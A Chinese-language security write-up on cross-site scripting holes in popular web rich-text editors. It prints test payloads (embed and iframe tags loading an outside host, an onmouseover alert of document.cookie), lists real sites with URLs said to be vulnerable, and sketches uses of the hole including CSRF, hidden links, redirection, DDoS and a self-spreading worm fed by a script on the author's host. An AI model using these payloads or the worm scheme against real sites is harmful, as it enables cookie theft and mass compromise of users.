测试代码:
<embed src="http://tmxk.org" />
<a href="http:// HdhCmsTest2cto测试数据 ">http://tmxk.org</a>
<span
onmouseover="javascript:alert(document.cookie)">alert(document.cook
ie)</span>
<img src="javascript:alert()" />
<iframe src="http://tmxk.org"></iframe>
<form>
<input type="text" />
</form>
测试环境:基于官方的demo、遨游浏览器(embed是html5标签,低版本的ie不支持)
测试思路:容许embed标签的插入,在没有对其allowScriptAccess属性设置时,默认为
sameDomain,这样就形成了xss,已测试可利用的五点有
①CSRF,利用访问者的权限来完成对指定页面的操作;
②SEO,即挂暗链操作;
③域名劫持,通过被插入页面不能被框架插入的特性,实现url跳转,即劫持;
④DDOS,利用被跨X站点的高流量,对指定url实现ddos攻击;
⑤蠕虫,结合一些站点特有的代码,形成蠕虫。
测试截图:
1.FCKeditor
2.NicEdit
3.TinyMCE
4.jwysiwyg
5.Yahoo!UILibrary:RichTextEditor
6.Xinha
8.FreeRichTextEditor
10.TTWHTMLEditor
11.FreeTextBox
12.WYMeditor
13.BlueShoesWysiwygEditor
14.markItUp
15.SPAWEditor
测试举例:
sina博客xss+csrf
人民网xss
cntv博客、 论坛 的xss
http://blog.cntv.cn/19047516-3863143. html
中国教育网博客
http://exe.blog.edu.cn/2012/751413.html
开源中国(以此举例)
CSRF:http://my.oschina.net/hucexe/blog/60430
蠕虫思路:打开http://tmxk.org/z/test/r.php?n=1-222的随机数,这里面是对指定页数用
户分享的代码的连接的抓取,形成数组http://tmxk.org/z/test/os.js供蠕虫代码调用。利用登
陆用户的权限对随机的url回复,利用编辑器的xss,再次插入测试代码,别的用户访问被
感染的网页时,csrf又再次向随机的一个网页插入此代码,如此爆炸式传播。
查看更多关于安全测试国内主流web编辑器xss跨站漏洞 - 网站安的详细内容...